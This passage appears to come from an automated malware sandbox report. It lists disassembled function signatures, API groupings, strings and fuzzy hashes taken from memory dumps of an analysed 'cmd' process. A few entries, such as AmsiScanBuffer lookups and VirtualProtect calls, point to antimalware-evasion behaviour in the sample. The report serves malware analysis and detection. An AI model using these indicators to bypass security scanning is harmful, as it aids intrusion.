                              • Instruction Fuzzy Hash: 5AF03C62324685E2EF60ABA1E5883597B61F744B9CF884021DE4D4A95CDF6CCAE9CB00
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: FinalHandleNamePathlstrlen
                              • String ID: \\?\
                              • API String ID: 2719912262-4282027825
                              • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction ID: b50c632942447cf0a9abd2777fead785a21b9bb0f9a94f0df33e2622780756e1
                              • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                              • Instruction Fuzzy Hash: 46F04961324685E1EF20ABA1FA883597771F744BCCF844021DE4D4A96CEE7CC6E8C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: f329678ab49624899b51cc9199976e66558ccd330fcf22870c52a77c45e323dc
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: 89F09621320701A1FE10BB9498983597B24EB457B8F580619DEBE5D5ECCF2CC8D8C340
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 86a1f76325fe174a4e04d6d10a4910e311ba62286f4e296a24583343b1b3637b
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction Fuzzy Hash: C2F08954324B80D1EE046B97B958119BA55B748FD4F494030ED0E5FB1CCF6CC8A68700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: AddressFreeHandleLibraryModuleProc
                              • String ID: CorExitProcess$mscoree.dll
                              • API String ID: 4061214504-1276376045
                              • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction ID: 5c0836342293d25b5eaa0e43f8a1606ced04965f5b279579bf749c49b5dcc0a5
                              • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                              • Instruction Fuzzy Hash: C2F01261321601A1EE14ABA4D9993597B60AB4576CF5407199E6D4D5F8CF2CC8A8C740
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CombinePath
                              • String ID: \\.\pipe\
                              • API String ID: 3422762182-91387939
                              • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction ID: 581b608e50ca20baecc8f784d030a3228e919175aa4bb26d6fd17132214ace6f
                              • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                              • Instruction Fuzzy Hash: 94F05454324B80E1EE14AB96FA581197A50A748FC8F444030ED0E4BF1DDE28C4A58700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: AddressLibraryLoadProcSleep
                              • String ID: AmsiScanBuffer$amsi.dll
                              • API String ID: 188063004-3248079830
                              • Opcode ID: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction ID: 5d53d0d81957059d61f44c4dc5528ceb4523e772e2785e25a4f3c627f1f18e48
                              • Opcode Fuzzy Hash: 594064a6cd66e1c3961e71c37a52b1967edf4951384bf957dace5d3e1a2af7c1
                              • Instruction Fuzzy Hash: A8D06794632640F6EE287BD1EA5D3543B61AB68F49FC44415CD0E096B8DE2D89F98740
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: bc0db52c1ada9e772fc07a355cbae7f8ff707f7532caf864a79bcb03dffeaad3
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 4402B93262DB84D6EB60DB55E49435ABBA5F3C5798F104015EACE8BBA8DF7CC494CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction ID: 6fd28fde26d5e6138cbba11b4bef24289d4c0e0eff5abab047aefc85b8a4376d
                              • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                              • Instruction Fuzzy Hash: 3602CC76129B84D6EB60DB55F59435ABBA1F3C8798F104015EA8E8BBACDF7CC494CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: e0dee242169ad69e50c59c98ba92cdc6448f2eb479820ff82c54d9559718464b
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: 79511636324600A7EB64EF95E44865A7BA8F388B88F504059DE9E4B75CCF38C8E5CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction ID: 4d2f920399fe31b19180a18007b302bc0dcf189a3960ce94e46abedb0857534f
                              • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                              • Instruction Fuzzy Hash: A1512B76320600A7EF64EFA5E54866A7BA0F788B48F504019DE9E4BB6CCF39C8D5C700
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: bc879426f79ae1264d95c646d3564b8edad53a37d6c7bf0ef7e08a1aa6f05486
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: E9510835334601A7EB64EF96E44862A7BA8F385B98F504158DE8E4B75CDF38C8E5CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: Value
                              • String ID:
                              • API String ID: 3702945584-0
                              • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction ID: 48eaf12f242f73fd77a8c970bd7a161f7efa624203064066d01bbe4909f670be
                              • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                              • Instruction Fuzzy Hash: F751F775220601A7EF24EFA6E54861A7BB0F389B88F504159DE8E4B76CDF39C8D5CB00
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: 40f88bbaf512151c2a1402632e7c92ec5679491f571eb2ba56072fe7e171ed39
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: 2261C836529A44D6EB60EB95E45831ABBE5F388758F100115FE8D8BBACDB7CC5A0CB04
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentThread
                              • String ID:
                              • API String ID: 2882836952-0
                              • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction ID: b150e6e6ddeb64847b2a31420f68e603a59a41bb9ad175384987a3c2e84b2fdf
                              • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                              • Instruction Fuzzy Hash: 76619C76529B44D6EB609B65E59831ABBE1F388748F100116EE8D4BBACDB7CC5A0CB40
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: 9fab67c08efdb61fb88663f76d4e8fee7c99f16c47f0cc3da182d367a681a429
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: 58113026615740E3FF24ABA1E44821A7BB4FB44B98F080126DE4D0B79CEB7DC9E4C784
                              APIs
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentProcessProtectVirtual$HandleModule
                              • String ID:
                              • API String ID: 1092925422-0
                              • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction ID: b3ae4cdf9310d86cc8b91dbea02ae17f13e4abaac1af2030b671ed6ce5623a06
                              • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                              • Instruction Fuzzy Hash: FD111226615740E3FF34ABA1E54821A7BB0FB45B88F440126DE4D0B7ACEB7DC9A4C784
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: f29c5e48f414a320111330a9cd9926e9adcb18cc0caf21a33b828ca5adad7c9b
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 5A519C33329600AAEF54EB95E448B6C7F99E754B9CF1581209E5E4F78CDB78C8A1C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
                              • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                              • String ID: csm
                              • API String ID: 2395640692-1018135373
                              • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction ID: cee73cb8460090dd7a0ca387e50b8e6c93f35da2742172f829457802e189e503
                              • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                              • Instruction Fuzzy Hash: 7E51A07322A600AADF64EBA5E548B6D7F91E354B8CF148110DE5E4F7ACDB78C8A5C700
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: 4c6183dcf0a36d8c5727a2f6a055d6d2d9b0a9c0fe61a65d6f06af10eac00d54
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: FB518F32120281ABFF74ABA595483587BA9F354B98F154216DE9D4BB99CB3CC4E0C781
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2986413017.0000022413901000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413900000, based on PE: true
                              • Associated: 00000013.00000002.2985211590.0000022413900000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2987944500.0000022413915000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2989139786.0000022413920000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2990508739.0000022413922000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2991786558.0000022413929000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413900000_cmd.jbxd
                              Similarity
                              • API ID: CallEncodePointerTranslator
                              • String ID: MOC$RCC
                              • API String ID: 3544855599-2084237596
                              • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction ID: 7f6c8823b8395a0b983c24e37b1afa2663760c937b366d21dcfc1d8b0e617134
                              • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                              • Instruction Fuzzy Hash: B761AC32528BC491EB20AF65E44479ABBA4F784B98F044215EFDC1BB99DB3CC0E0CB40
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000003.2594733035.00000224138D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000224138D0000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_3_224138d0000_cmd.jbxd
                              Similarity
                              • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                              • String ID: csm$csm
                              • API String ID: 3896166516-3733052814
                              • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction ID: 5d32d3d82a8f4b3e651e4303e9f6b8589f3073ff91bf5acac5217a4a16babfb0
                              • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                              • Instruction Fuzzy Hash: EA515B32204280EAEF74AFA5E548358BBE1E355B98F244115DA9D4FB95CB38E8E0CB41
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000013.00000002.2994535637.0000022413931000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000022413930000, based on PE: true
                              • Associated: 00000013.00000002.2993151918.0000022413930000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2996214908.0000022413945000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2997607093.0000022413950000.00000004.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.2998872667.0000022413952000.00000002.00001000.00020000.00000000.sdmpDownload File
                              • Associated: 00000013.00000002.3000146971.0000022413959000.00000002.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_19_2_22413930000_cmd.jbxd
                              Similarity
